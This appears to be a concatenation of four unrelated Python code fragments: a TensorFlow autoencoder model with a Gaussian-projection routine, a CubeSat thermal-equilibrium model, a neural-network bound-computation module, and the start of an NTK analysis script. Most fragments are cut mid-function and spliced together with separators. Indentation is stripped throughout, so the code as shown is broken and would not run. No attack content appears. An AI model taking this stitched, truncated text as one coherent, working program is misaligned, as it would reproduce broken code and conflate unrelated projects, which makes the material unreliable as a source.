tf.float32, [None, opts['latent_space_dim']],
name='sample_ph')
v = tf.get_variable(
"proj_v", [opts['latent_space_dim'], 1],
tf.float32, tf.random_normal_initializer(stddev=1.))
u = tf.get_variable(
"proj_u", [opts['latent_space_dim'], 1],
tf.float32, tf.random_normal_initializer(stddev=1.))
npoints = tf.cast(tf.shape(sample_ph)[0], tf.int32)
# First we need to make sure projection matrix is orthogonal
v_norm = tf.nn.l2_normalize(v, 0)
dotprod = tf.reduce_sum(tf.multiply(u, v_norm))
u_ort = u - dotprod * v_norm
u_norm = tf.nn.l2_normalize(u_ort, 0)
Mproj = tf.concat([v_norm, u_norm], 1)
sample_proj = tf.matmul(sample_ph, Mproj)
a = tf.eye(npoints) - tf.ones([npoints, npoints]) / tf.cast(npoints, tf.float32)
b = tf.matmul(sample_proj, tf.matmul(a, a), transpose_a=True)
b = tf.matmul(b, sample_proj)
# Sample covariance matrix
covhat = b / (tf.cast(npoints, tf.float32) - 1)
# covhat = tf.Print(covhat, [covhat], 'Cov:')
with tf.variable_scope('leastGaussian2d'):
gcov = opts['pot_pz_std'] * opts['pot_pz_std'] * tf.eye(2)
# l2 distance between sample cov and the Gaussian cov
projloss = tf.reduce_sum(tf.square(covhat - gcov))
# Also account for the first moment, i.e. expected value
projloss += tf.reduce_sum(tf.square(tf.reduce_mean(sample_proj, 0)))
# We are maximizing
projloss = -projloss
optim = tf.train.AdamOptimizer(0.001, 0.9)
optim = optim.minimize(projloss, var_list=[v, u])
self._proj_u = u_norm
self._proj_v = v_norm
self._proj_sample_ph = sample_ph
self._proj_covhat = covhat
self._proj_loss = projloss
self._proj_optim = optim
def least_gaussian_2d(self, opts, X):
"""
Given a sample X of shape (n_points, n_z) find 2d plain
such that projection looks least gaussian.
"""
with self._session.as_default(), self._session.graph.as_default():
sample_ph = self._proj_sample_ph
optim = self._proj_optim
loss = self._proj_loss
u = self._proj_u
v = self._proj_v
covhat = self._proj_covhat
proj_mat = tf.concat([v, u], 1).eval()
dot_prod = -1
best_of_runs = 10e5 # Any positive value would do
updated = False
for _start in xrange(3):
# We will run 3 times from random inits
loss_prev = 10e5 # Any positive value would do
proj_vars = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope="leastGaussian2d")
self._session.run(tf.variables_initializer(proj_vars))
step = 0
for _ in xrange(5000):
self._session.run(optim, feed_dict={sample_ph:X})
step += 1
if step % 10 == 0:
loss_cur = loss.eval(feed_dict={sample_ph: X})
rel_imp = abs(loss_cur - loss_prev) / abs(loss_prev)
if rel_imp < 1e-2:
break
loss_prev = loss_cur
loss_final = loss.eval(feed_dict={sample_ph: X})
if loss_final < best_of_runs:
updated = True
best_of_runs = loss_final
proj_mat = tf.concat([v, u], 1).eval()
dot_prod = tf.reduce_sum(tf.multiply(u, v)).eval()
if not updated:
logging.error('WARNING: possible bug in the worst 2d projection')
return proj_mat, dot_prod
def _build_model_internal(self, opts):
"""Build the Graph corresponding to POT implementation.
"""
data_shape = self._data.data_shape
additional_losses = collections.OrderedDict()
# Placeholders
real_points_ph = tf.placeholder(
tf.float32, [None] + list(data_shape), name='real_points_ph')
noise_ph = tf.placeholder(
tf.float32, [None] + [opts['latent_space_dim']], name='noise_ph')
enc_noise_ph = tf.placeholder(
tf.float32, [None] + [opts['latent_space_dim']], name='enc_noise_ph')
lr_decay_ph = tf.placeholder(tf.float32)
is_training_ph = tf.placeholder(tf.bool, name='is_training_ph')
keep_prob_ph = tf.placeholder(tf.float32, name='keep_prob_ph')
# Operations
if opts['pz_transform']:
assert opts['z_test'] == 'gan', 'Pz transforms are currently allowed only for POT+GAN'
noise = self.pz_sampler(opts, noise_ph)
else:
noise = noise_ph
real_points = self._data_augmentation(
opts, real_points_ph, is_training_ph)
if opts['e_is_random']:
# If encoder is random we map the training points
# to the expectation of Q(Z|X) and then add the scaled
# Gaussian noise corresponding to the learned sigmas
enc_train_mean, enc_log_sigmas = self.encoder(
opts, real_points,
is_training=is_training_ph, keep_prob=keep_prob_ph)
# enc_log_sigmas = tf.Print(enc_log_sigmas, [tf.reduce_max(enc_log_sigmas),
# tf.reduce_min(enc_log_sigmas),
# tf.reduce_mean(enc_log_sigmas)], 'Log sigmas:')
# enc_log_sigmas = tf.Print(enc_log_sigmas, [tf.slice(enc_log_sigmas, [0,0], [1,-1])], 'Log sigmas:')
# stds = tf.sqrt(tf.exp(enc_log_sigmas) + 1e-05)
stds = tf.sqrt(tf.nn.relu(enc_log_sigmas) + 1e-05)
# stds = tf.Print(stds, [stds[0], stds[1], stds[2], stds[3]], 'Stds: ')
# stds = tf.Print(stds, [enc_train_mean[0], enc_train_mean[1], enc_train_mean[2]], 'Means: ')
scaled_noise = tf.multiply(stds, enc_noise_ph)
encoded_training = enc_train_mean + scaled_noise
else:
encoded_training = self.encoder(
opts, real_points,
is_training=is_training_ph, keep_prob=keep_prob_ph)
reconstructed_training = self.generator(
opts, encoded_training,
is_training=is_training_ph, keep_prob=keep_prob_ph)
reconstructed_training.set_shape(real_points.get_shape())
if opts['recon_loss'] == 'l2':
# c(x,y) = ||x - y||_2
loss_reconstr = tf.reduce_sum(
tf.square(real_points - reconstructed_training), axis=1)
# sqrt(x + delta) guarantees the direvative 1/(x + delta) is finite
loss_reconstr = tf.reduce_mean(tf.sqrt(loss_reconstr + 1e-08))
elif opts['recon_loss'] == 'l2f':
# c(x,y) = ||x - y||_2
loss_reconstr = tf.reduce_sum(
tf.square(real_points - reconstructed_training), axis=[1, 2, 3])
loss_reconstr = tf.reduce_mean(tf.sqrt(1e-08 + loss_reconstr)) * 0.2
elif opts['recon_loss'] == 'l2sq':
# c(x,y) = ||x - y||_2^2
loss_reconstr = tf.reduce_sum(
tf.square(real_points - reconstructed_training), axis=[1, 2, 3])
loss_reconstr = tf.reduce_mean(loss_reconstr) * 0.05
elif opts['recon_loss'] == 'l1':
# c(x,y) = ||x - y||_1
loss_reconstr = tf.reduce_mean(tf.reduce_sum(
tf.abs(real_points - reconstructed_training), axis=[1, 2, 3])) * 0.02
else:
assert False
# Pearson independence test of coordinates in Z space
loss_z_corr = self.correlation_loss(opts, encoded_training)
# Perform a Qz = Pz goodness of fit test based on Stein Discrepancy
if opts['z_test'] == 'gan':
# Pz = Qz test based on GAN in the Z space
d_logits_Pz = self.discriminator(opts, noise)
d_logits_Qz = self.discriminator(opts, encoded_training, reuse=True)
d_loss_Pz = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=d_logits_Pz, labels=tf.ones_like(d_logits_Pz)))
d_loss_Qz = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=d_logits_Qz, labels=tf.zeros_like(d_logits_Qz)))
d_loss_Qz_trick = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=d_logits_Qz, labels=tf.ones_like(d_logits_Qz)))
d_loss = opts['pot_lambda'] * (d_loss_Pz + d_loss_Qz)
if opts['pz_transform']:
loss_match = d_loss_Qz_trick - d_loss_Pz
else:
loss_match = d_loss_Qz_trick
elif opts['z_test'] == 'mmd':
# Pz = Qz test based on MMD(Pz, Qz)
loss_match = self.discriminator_mmd_test(opts, encoded_training, noise)
d_loss = None
d_logits_Pz = None
d_logits_Qz = None
elif opts['z_test'] == 'lks':
# Pz = Qz test without adversarial training
# based on Kernel Stein Discrepancy
# Uncomment next line to check for the real Pz
# loss_match = self.discriminator_test(opts, noise_ph)
| |
<filename>notebooks/sputnikTools.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
### numerical model specifications and physical constants
def getPhysConstants():
physConst = {}
physConst['RE'] = 6371.0 # Earth's radius in km
physConst['sigSB'] = 5.6703*(10**-8) # Stefan-Boltzmann constant
physConst['KelToCel'] = 273.15 # 0 C in Kelvin
return physConst
def getInputParamsDefault():
params = {}
physConst = getPhysConstants()
## environment (radiation from Sun and Earth)
params['Fsun'] = 1372 # solar flux, W/m2
params['FIR'] = 240 # Earth's IR flux, W/m2
params['rhoE'] = 0.3 # Earth's reflectivity
## orbit
params['h'] = 550.0 # in km, orbit's altitude
params['PorbMin'] = 90 # orbital period in minutes
params['etaP'] = 0.33 # fraction of orbit in eclipse
params['falb'] = 0.62 # correction for albedo variation
# for polar orbit facing Sun: 0.06
# view factor
RE = physConst['RE']
params['fE'] = (RE/(RE+params['h']))**2
## satellite
# area
params['Atot'] = 0.10 # in m2, as 2U CubeSat
params['etaS'] = 0.25 # effective area ratio, sphere, point source
params['etaE'] = 0.50 # effective area ratio, sphere, hemisphere
# use instead the version with a correction for incomplete hemisphere
# it's basically viewing factor for two spheres multiplied by fE
params['etaE'] = 0.50 * (1-np.sqrt(1-params['fE'])) / params['fE']
# surface emissivity
params['alphaS'] = 0.86 # black anodized Al
params['epsT'] = 0.86 # black anodized Al
params['alphaIR'] = params['epsT'] # usual ansatz
# thermal inertia
params['mass'] = 2.0 # kg (n.b. implies density)
params['C'] = 921.0 # J/kg/K, aluminum
# battery charging/power dissipation
params['etaCell'] = 0.2 # fraction of energy for charging
return params
def getInputParamsHot(params=""):
if (params==""):
params = getInputParamsDefault()
## modify for the hot case
# environment (radiation from Sun and Earth)
params['Fsun'] = 1422 # solar flux, W/m2
params['FIR'] = 260 # Earth's IR flux, W/m2
params['rhoE'] = 0.35 # Earth's reflectivity
## orbit
params['etaP'] = 0.0 # no eclipse in beta=90 (terminator) orbit
params['falb'] = 0.06 # correction for albedo in hot orbit
return params
def getInputParamsCold(params=""):
if (params==""):
params = getInputParamsDefault()
## modify for the cold case
# environment (radiation from Sun and Earth)
params['Fsun'] = 1322 # solar flux, W/m2
params['FIR'] = 220 # Earth's IR flux, W/m2
params['rhoE'] = 0.25 # Earth's reflectivity
return params
### heat flux and equilibrium temperature evaluations
def getQsun(p):
return p['etaS']*p['Atot']*p['alphaS']*p['Fsun']
def getQref(p):
return p['fE']*p['etaE']*p['Atot']*p['falb']*p['rhoE']*p['alphaS']*p['Fsun']
def getQIR(p):
return p['fE']*p['etaE']*p['Atot']* p['alphaIR']*p['FIR']
def getQdissip(p):
return p['etaCell']*(1-p['etaP'])*(getQsun(p)+getQref(p))
def getQin(p):
QinSun = (1-p['etaCell']*p['etaP'])*(getQsun(p)+getQref(p)) + getQIR(p)
QinEclipse = getQIR(p) + getQdissip(p)
return QinSun, QinEclipse
def getAllHeatQ(p):
return getQsun(p), getQref(p), getQIR(p), getQdissip(p)
## equilibrium temperatures
def getTeq(Qin,p):
physConst = getPhysConstants()
return (Qin/(p['Atot']*p['epsT']*physConst['sigSB']))**0.25
# return the view factor divided by fE=(RE/(RE+altitude))^2
# here fE = 1/h^2
def getF12h2(h,beta):
rad2deg = 180/np.pi
brad = beta/rad2deg
if (brad<=np.arccos(1/h)):
return np.cos(brad)
x = np.sqrt(h**2-1)
y = -x / np.tan(brad)
if (y>1):
return 0
z = np.sqrt(1-y**2)
t1 = (np.cos(brad)*np.arccos(y)-x*np.sin(brad)*z)
t2 = np.arctan(np.sin(brad)*z/x)
# print(x,y,z,t1,t2)
return (t1+t2*h**2)/np.pi
def getEffectiveAreas2U(h, beta):
if ((beta<0)or(beta>180)):
return 0
if (beta>90):
beta = 180-beta
# small side towards Earth
s1 = getF12h2(h, beta)
# the "other" small side
s2 = getF12h2(h, 180-beta)
# long 2U side "towards" Earth
s3 = 2 * getF12h2(h, beta+90)
# long 2U side "away from" Earth
s4 = 2 * getF12h2(h, 180 - (beta+90))
# 2 long 2U sides "perpendicular to" Earth
s5 = 2 * 2 * getF12h2(h, 90)
# print(h,beta,s1, s2, s3, s4, s5)
return (s1+s2+s3+s4+s5)/10
def getEffectiveAreas1U(h, beta):
if ((beta<0)or(beta>180)):
return 0
if (beta>90):
beta = 180-beta
# small side towards Earth
s1 = getF12h2(h, beta)
# the "other" small side
s2 = getF12h2(h, 180-beta)
# small side "towards" Earth
s3 = getF12h2(h, beta+90)
# small side "away from" Earth
s4 = getF12h2(h, 180 - (beta+90))
# 2 small sides "perpendicular to" Earth
s5 = 2 * getF12h2(h, 90)
# print(h,beta,s1, s2, s3, s4, s5)
return (s1+s2+s3+s4+s5)/6
## for compatibility with old code
def doOneCase(modelTitleText,alpha,epsilon, params="", verbose=False):
physConst = getPhysConstants()
titlePrint(modelTitleText)
if (params == ""):
print('using default parameters from getInputParamsDefault()')
params = getInputParamsDefault()
params['alphaS'] = alpha
params['epsT'] = epsilon
params['alphaIR'] = params['epsT']
# heat fluxes
Q_sun_flux, Q_albedo_flux, Q_IR_flux, Q_int = getAllHeatQ(params)
if (verbose):
print('Q (sun, alb, IR, diss):', Q_sun_flux, Q_albedo_flux, Q_IR_flux, Q_int)
# equilibrium solutions
Q_hot, Q_cold = getQin(params)
print('Qsun=', Q_hot, ' Qeclipse=', Q_cold)
Temp_hot = getTeq(Q_hot,params)
Temp_cold = getTeq(Q_cold,params)
if (verbose):
printEqTemp('Hot', Temp_hot, physConst['KelToCel'])
printEqTemp('Cold', Temp_cold, physConst['KelToCel'])
# solve for time variation
t0H = getTimeConstant(params,Temp_hot)
t0C = getTimeConstant(params,Temp_cold)
xH = (1-params['etaP'])*params['PorbMin']*60/t0H
xC = params['etaP']*params['PorbMin']*60/t0C
Tmin, Tmax, tau0C, tauFC, tau0H, tauFH = solveBistableEquilibrium(xC, xH, Temp_cold, Temp_hot, 1000)
# generate temperature arrays
timeA, TempsA = getFullTempArray(params, Tmin, Tmax, Temp_cold, Temp_hot, t0C, t0H)
if (verbose):
print('doOneCase: temp. range =', np.min(TempsA), np.max(TempsA))
print(' in Celsius: range =', np.min(TempsA-273.15), np.max(TempsA-273.15))
return timeA, TempsA
def getTimeConstant(params,Teq):
physConst = getPhysConstants()
return (params['mass']*params['C']/physConst['sigSB']/params['Atot']/params['epsT']/Teq**3)
def getFullTempArray(params, Tmin, Tmax, Temp_cold, Temp_hot, t0C, t0H):
# generate temperature arrays
if (Tmin >= Temp_hot):
print('adjusting Tmin=', Tmin, 'to: Thot=', Temp_hot)
Tmin = 0.998*Temp_hot
if (Tmin <= Temp_cold):
print('adjusting Tmin=', Tmin, 'to: Tcold=', Temp_cold)
Tmin = 1.001*Temp_cold
if (Tmax >= Temp_hot):
print('adjusting Tmax=', Tmax, 'to: Thot=', Temp_hot)
Tmax = 0.999*Temp_hot
TempsC = np.linspace(Tmax, Tmin, 100)
timeC = getTempSolution(TempsC, t0C, Temp_cold)
TempsH = np.linspace(Tmin, Tmax, 200)
timeH = getTempSolution(TempsH, t0H, Temp_hot)
timeH[-1] = (1-params['etaP'])*params['PorbMin']*60
# concatenate both solutions
timeOffset = params['etaP']*params['PorbMin']*60
timeHot = (1-params['etaP'])*params['PorbMin']*60
timeHshifted = timeH/np.max(timeH)*timeHot + timeOffset
timeA = np.concatenate((timeC/np.max(timeC)*timeOffset, timeHshifted), axis=None)
TempsA = np.concatenate((TempsC, TempsH), axis=None)
return timeA, TempsA
def getNumSolution(params, Tstart, Tc=0.0, Pc=0.0):
orbPeriodMin = params['PorbMin']
etaP = params['etaP']
t_final_min = orbPeriodMin*etaP # eclipse duration in minutes
t_step = 1.0 # integration step in seconds
# Tstart = TempsBlack[0]
Qs, Qe = getQin(params)
epsT = params['epsT']
Atot = params['Atot']
C = params['C']
mass = params['mass']
physConst = getPhysConstants()
sigmaSB = physConst['sigSB']
if (etaP>0):
facSun = (1-etaP)/etaP
else:
facSun = 1.0
# need to enforce cyclic boundary condition with iterations
# the duration of "sunshine", in units of eclipse time (=t_final_min)
for k in range(0,25):
time1, Temps1 = nonSteadyStateTemp(Tstart,t_final_min,t_step,Qe,C,mass,sigmaSB,epsT,Atot,Tc,Pc)
tmax = facSun*t_final_min
time2, Temps2 = nonSteadyStateTemp(Temps1[-1],tmax,t_step,Qs,C,mass,sigmaSB,epsT,Atot,Tc,Pc)
Tstart = 0.5*(Tstart+Temps2[-1])
time = np.concatenate((time1, (time2+time1[-1])), axis=None)
Temperature = np.concatenate((Temps1, Temps2), axis=None)
return time, Temperature
# given x and a tau0 array, find tau for each tau0
def getTauSolution(x, tau0, Nsteps=100):
tauFinal = 0*tau0
for i in range(0,np.size(tau0)):
thisTau0 = tau0[i]
tauGrid = np.linspace(thisTau0, 1, Nsteps)
notdone = True
for j in range(1,np.size(tauGrid)):
if (notdone):
thisTau = tauGrid[j]
thisX = getXforTempSolution(thisTau, thisTau0)
if (thisX >= x):
tauFinal[i] = thisTau
notdone = False
return tauFinal
# given tau and tau0, return x=t/t0
def getXforTempSolution(tau, tau0):
x1 = 0.5*(np.arctan(tau)-np.arctan(tau0))
x2 = 0.25*(np.log((tau+1)/(tau0+1)) - np.log((tau-1)/(tau0-1)))
return x1+x2
# given an array of temperatures, Teq and t0, return model time grid
def getTempSolution(T, t0, Teq):
tau = T/Teq
# print('getTempSolution: Teq, t0, tau0, tauFinal=', Teq, t0, tau[0], tau[-1])
t1 = 0.5*(np.arctan(tau)-np.arctan(tau[0]))
t2 = 0.25*(np.log((tau+1)/(tau[0]+1)) - np.log((tau-1)/(tau[0]-1)))
return t0*(t1+t2)
def solveBistableEquilibrium(xC, xH, TeqCold, TeqHot, Nsteps=100):
C1 = TeqCold / TeqHot
tau0Carr = np.linspace(1.01,3.0, Nsteps)
tauFinalCarr = getTauSolution(xC, tau0Carr)
tau0Harr = C1*tauFinalCarr
tauFinalHarr = getTauSolution(xH, tau0Harr)
tau0C2 = tauFinalHarr/C1
## now solve for tauFinalCarr(tau0Carr) = tauFinalCarr(tau0C2)
## to get tau0C and tauFinalC, and then tau0H, tauFinalH, and
## finally TminEq and TmaxEq
# by construction, tau0Carr and tau0C2 are increasing
# and at first point tau0C2[0] > tau0Carr[0]
notdone = True
for i in range(1,np.size(tau0C2)):
if (notdone):
if (tau0Carr[i] >= tau0C2[i]):
tau0C = tau0Carr[i]
tauFinalC = tauFinalCarr[i]
notdone = False
tau0H = C1 * tauFinalC
tauFinalH = C1 * tau0C
TminEq = tauFinalC * TeqCold
TmaxEq = tau0C * TeqCold
return TminEq, TmaxEq, tau0C, tauFinalC, tau0H, tauFinalH
############# old code from <NAME> (University of Washington) #################################
def nonSteadyStateTemp(Tinitial,t_final_min,t_step,Qheating,c,mass,sigma,emissivity,Area_sphere,Tc,Pc):
T = Tinitial # set the initial temp to the hot eq temp
Temps = []
| |
import time
import os
import numpy as np
from collections import OrderedDict, deque, defaultdict
import torch
import torch.optim as optim
from torch.nn import DataParallel, Parameter, parameter
from .bound_op_map import bound_op_map
from .bound_ops import *
from .bounded_tensor import BoundedTensor, BoundedParameter
from .parse_graph import parse_module
from .perturbations import *
from .utils import *
from .adam_element_lr import AdamElementLR
import warnings
warnings.simplefilter("once")
class BoundedModule(nn.Module):
"""Bounded module with support for automatically computing bounds.
Args:
model (nn.Module): The original model to be wrapped by BoundedModule.
global_input (tuple): A dummy input to the original model. The shape of
the dummy input should be consistent with the actual input to the model
except for the batch dimension.
bound_opts (dict): Options for bounds. See
`Bound Options <bound_opts.html>`_.
device (str or torch.device): Device of the bounded module.
If 'auto', the device will be automatically inferred from the device of
parameters in the original model or the dummy input.
custom_ops (dict): A dictionary of custom operators.
The dictionary maps operator names to their corresponding bound classes
(subclasses of `Bound`).
"""
def __init__(self, model, global_input, bound_opts=None, auto_batch_dim=True, device='auto',
verbose=False, custom_ops={}):
super(BoundedModule, self).__init__()
if isinstance(model, BoundedModule):
for key in model.__dict__.keys():
setattr(self, key, getattr(model, key))
return
if bound_opts is None:
bound_opts = {}
# Default options.
default_bound_opts = {'ibp_relative': False, 'conv_mode': 'patches', 'sparse_intermediate_bounds': True, 'sparse_conv_intermediate_bounds': True}
default_bound_opts.update(bound_opts)
self.bound_opts = default_bound_opts
self.verbose = verbose
self.custom_ops = custom_ops
self.auto_batch_dim = auto_batch_dim
if device == 'auto':
try:
self.device = next(model.parameters()).device
except StopIteration: # Model has no parameters. We use the device of input tensor.
self.device = global_input.device
else:
self.device = device
self.global_input = global_input
self.ibp_relative = self.bound_opts.get('ibp_relative', False)
self.conv_mode = self.bound_opts.get('conv_mode', 'patches')
if auto_batch_dim:
# logger.warning('Using automatic batch dimension inferring, which may not be correct')
self.init_batch_size = -1
state_dict_copy = copy.deepcopy(model.state_dict())
object.__setattr__(self, 'ori_state_dict', state_dict_copy)
model.to(self.device)
self.final_shape = model(*unpack_inputs(global_input, device=self.device)).shape
self.bound_opts.update({'final_shape': self.final_shape})
self._convert(model, global_input)
self._mark_perturbed_nodes()
# set the default values here
optimize_bound_args = {'ob_iteration': 20, 'ob_beta': False, 'ob_alpha': True, 'ob_alpha_share_slopes': False,
'ob_opt_coeffs': False, 'ob_opt_bias': False,
'ob_optimizer': 'adam', 'ob_verbose': 0,
'ob_keep_best': True, 'ob_update_by_layer': True, 'ob_lr': 0.5,
'ob_lr_beta': 0.05, 'ob_init': True,
'ob_single_node_split': True, 'ob_lr_intermediate_beta': 0.1,
'ob_lr_coeffs': 0.01, 'ob_intermediate_beta': False, 'ob_intermediate_refinement_layers': [-1],
'ob_loss_reduction_func': reduction_sum,
'ob_stop_criterion_func': lambda x: False,
'ob_input_grad': False,
'ob_lr_decay': 0.98 }
# change by bound_opts
optimize_bound_args.update(self.bound_opts.get('optimize_bound_args', {}))
self.bound_opts.update({'optimize_bound_args': optimize_bound_args})
self.next_split_hint = [] # Split hints, used in beta optimization.
self.relus = [] # save relu layers for convenience
for l in self._modules.values():
if isinstance(l, BoundRelu):
self.relus.append(l)
self.optimizable_activations = []
for l in self._modules.values():
if isinstance(l, BoundOptimizableActivation):
self.optimizable_activations.append(l)
# Beta values for all intermediate bounds. Set to None (not used) by default.
self.best_intermediate_betas = None
# Initialization value for intermediate betas.
self.init_intermediate_betas = None
"""Some operations are non-deterministic and deterministic mode will fail. So we temporary disable it."""
def non_deter_wrapper(self, op, *args, **kwargs):
if self.bound_opts.get('deterministic', False):
torch.use_deterministic_algorithms(False)
ret = op(*args, **kwargs)
if self.bound_opts.get('deterministic', False):
torch.use_deterministic_algorithms(True)
return ret
def non_deter_scatter_add(self, *args, **kwargs):
return self.non_deter_wrapper(torch.scatter_add, *args, **kwargs)
def non_deter_index_select(self, *args, **kwargs):
return self.non_deter_wrapper(torch.index_select, *args, **kwargs)
def set_bound_opts(self, new_opts):
for k, v in new_opts.items():
assert v is not dict, 'only support change optimize_bound_args'
self.bound_opts[k].update(v)
def __call__(self, *input, **kwargs):
if "method_opt" in kwargs:
opt = kwargs["method_opt"]
kwargs.pop("method_opt")
else:
opt = "forward"
for kwarg in [
'disable_multi_gpu', 'no_replicas', 'get_property',
'node_class', 'att_name']:
if kwarg in kwargs:
kwargs.pop(kwarg)
if opt == "compute_bounds":
return self.compute_bounds(**kwargs)
else:
return self.forward(*input, **kwargs)
def register_parameter(self, name, param):
r"""Adds a parameter to the module.
The parameter can be accessed as an attribute using given name.
Args:
name (string): name of the parameter. The parameter can be accessed
from this module using the given name
param (Parameter): parameter to be added to the module.
"""
if '_parameters' not in self.__dict__:
raise AttributeError(
"cannot assign parameter before Module.__init__() call")
elif not isinstance(name, torch._six.string_classes):
raise TypeError("parameter name should be a string. "
"Got {}".format(torch.typename(name)))
elif name == '':
raise KeyError("parameter name can't be empty string \"\"")
elif hasattr(self, name) and name not in self._parameters:
raise KeyError("attribute '{}' already exists".format(name))
if param is None:
self._parameters[name] = None
elif not isinstance(param, Parameter):
raise TypeError("cannot assign '{}' object to parameter '{}' "
"(torch.nn.Parameter or None required)"
.format(torch.typename(param), name))
elif param.grad_fn:
raise ValueError(
"Cannot assign non-leaf Tensor to parameter '{0}'. Model "
"parameters must be created explicitly. To express '{0}' "
"as a function of another Tensor, compute the value in "
"the forward() method.".format(name))
else:
self._parameters[name] = param
def load_state_dict(self, state_dict, strict=False):
new_dict = OrderedDict()
# translate name to ori_name
for k, v in state_dict.items():
if k in self.node_name_map:
new_dict[self.node_name_map[k]] = v
return super(BoundedModule, self).load_state_dict(new_dict, strict=strict)
def _named_members(self, get_members_fn, prefix='', recurse=True):
r"""Helper method for yielding various names + members of modules."""
memo = set()
modules = self.named_modules(prefix=prefix) if recurse else [(prefix, self)]
for module_prefix, module in modules:
members = get_members_fn(module)
for k, v in members:
if v is None or v in memo:
continue
memo.add(v)
name = module_prefix + ('.' if module_prefix else '') + k
# translate name to ori_name
if name in self.node_name_map:
name = self.node_name_map[name]
yield name, v
def train(self, mode=True):
super().train(mode)
for node in self._modules.values():
node.train(mode=mode)
def eval(self):
super().eval()
for node in self._modules.values():
node.eval()
def forward(self, *x, final_node_name=None, clear_forward_only=False):
r"""Standard forward computation for the network.
Args:
x (tuple or None): Input to the model.
final_node_name (str, optional): The name of the final node in the model. The value
on the corresponding node will be returned.
clear_forward_only (bool, default `False`): Whether only standard forward values stored
on the nodes should be cleared. If `True`, only standard forward values stored on the
nodes will be cleared. Otherwise, bound information on the nodes will also be cleared.
Returns:
output: The output of the model, or if `final_node_name` is not `None`, return the
value on the corresponding node instead.
"""
self._set_input(*x, clear_forward_only=clear_forward_only)
degree_in = {}
queue = deque()
for key in self._modules.keys():
l = self._modules[key]
degree_in[l.name] = len(l.input_name)
if degree_in[l.name] == 0:
queue.append(l)
forward_values = {}
final_output = None
while len(queue) > 0:
l = queue.popleft()
inp = [forward_values[l_pre] for l_pre in l.input_name]
for l_pre in l.inputs:
l.from_input = l.from_input or l_pre.from_input
fv = l.forward(*inp)
if isinstance(fv, torch.Size) or isinstance(fv, tuple):
fv = torch.tensor(fv, device=self.device)
object.__setattr__(l, 'forward_value', fv)
# infer batch dimension
if not hasattr(l, 'batch_dim'):
inp_batch_dim = [l_pre.batch_dim for l_pre in l.inputs]
try:
l.batch_dim = l.infer_batch_dim(self.init_batch_size, *inp_batch_dim)
except:
raise Exception(
'Fail to infer the batch dimension of ({})[{}]: forward_value shape {}, input batch dimensions {}'.format(
l, l.name, l.forward_value.shape, inp_batch_dim))
forward_values[l.name] = l.forward_value
# Unperturbed node but it is not a root node. Save forward_value to value.
# (Can be used in forward bounds.)
if not l.from_input and len(l.inputs) > 0:
l.value = l.forward_value
for l_next in l.output_name:
degree_in[l_next] -= 1
if degree_in[l_next] == 0: # all inputs of this node have already set
queue.append(self._modules[l_next])
if final_node_name:
return forward_values[final_node_name]
else:
out = deque([forward_values[n] for n in self.output_name])
def _fill_template(template):
if template is None:
return out.popleft()
elif isinstance(template, list) or isinstance(template, tuple):
res = []
for t in template:
res.append(_fill_template(t))
return tuple(res) if isinstance(template, tuple) else res
elif isinstance(template, dict):
res = {}
for key in template:
res[key] = _fill_template(template[key])
return res
else:
raise NotImplementedError
return _fill_template(self.output_template)
"""Mark the graph nodes and determine which nodes need perturbation."""
def _mark_perturbed_nodes(self):
degree_in = {}
queue = deque()
# Initially the queue contains all "root" nodes.
for key in self._modules.keys():
l = self._modules[key]
degree_in[l.name] = len(l.input_name)
if degree_in[l.name] == 0:
queue.append(l) # in_degree ==0 -> root node
while len(queue) > 0:
l = queue.popleft()
# Obtain all output node, and add the output nodes to the queue if all its input nodes have been visited.
# the initial "perturbed" property is set in BoundInput or BoundParams object, depending on ptb.
for name_next in l.output_name:
node_next = self._modules[name_next]
if isinstance(l, BoundShape):
# Some nodes like Shape, even connected, do not really propagate bounds.
# TODO: make this a property of node?
pass
else:
# The next node is perturbed if it is already perturbed, or this node is perturbed.
node_next.perturbed | |
<reponame>goldblum/TruthOrBackpropaganda
"""Analyze NTKs."""
import argparse
import torch
import torchvision
import torchvision.transforms as transforms
import numpy as np
import scipy
import datetime
from collections import OrderedDict
import os
import csv
import matplotlib.pyplot as plt
import dl_myths as dl
from pytorch_cifar.models import WideResNet, BasicBlock, ResNet18
from WideResNet_pytorch.networks import Wide_ResNet
from torchvision.models import MobileNetV2, VGG
from torchvision.models.vgg import make_layers
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser(description='Analyze ntks')
parser.add_argument('--lr', default=0.01, type=float, help='learning rate')
parser.add_argument('--epochs', default=600, type=int, help='number of epochs for training') # CHANGE TO 150
parser.add_argument('--switch_to_gd', default=10_000, type=int)
parser.add_argument('--stop_batchnorm', default=10_000, type=int)
parser.add_argument('--full_batch', action='store_true')
parser.add_argument('--path', default='/cmlscratch/jonas0/DL_myth_data/', type=str)
parser.add_argument('--table_path', default='tables/', type=str)
parser.add_argument('--width', default=1, type=float)
parser.add_argument('--print', default=50, type=int)
parser.add_argument('--bs', default=128, type=int)
parser.add_argument('--weight_decay', default=5e-4, type=float)
parser.add_argument('--net', default='MLP', type=str)
parser.add_argument('--rerun', action='store_true')
parser.add_argument('--pdist', action='store_true')
parser.add_argument('--sampling', default=25, type=int)
# debug
parser.add_argument('--dryrun', action='store_true')
args = parser.parse_args()
if args.net != 'MobileNetV2':
args.width = int(args.width)
config = dict()
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
dtype = torch.float
config['setup'] = dict(device=device, dtype=dtype)
config['batch_size'] = args.bs
config['epochs'] = args.epochs
config['print_loss'] = args.print
config['weight_decay'] = args.weight_decay
config['lr'] = args.lr
config['switch_to_gd'] = args.switch_to_gd
config['stop_batchnorm'] = args.stop_batchnorm
config['full_batch'] = args.full_batch
config['path'] = args.path
config['width'] = args.width
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def main():
"""Check ntks in a single call."""
print(f'RUNNING NTK EXPERIMENT WITH NET {args.net} and WIDTH {args.width}')
print(f'CPUs: {torch.get_num_threads()}, GPUs: {torch.torch.cuda.device_count()}')
print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
trainloader, testloader = dl.get_loaders('CIFAR10', config['batch_size'], augmentations=False, shuffle=False)
if args.net == 'ResNet':
net = WideResNet(BasicBlock, [2, 2, 2, 2], widen_factor=config['width'])
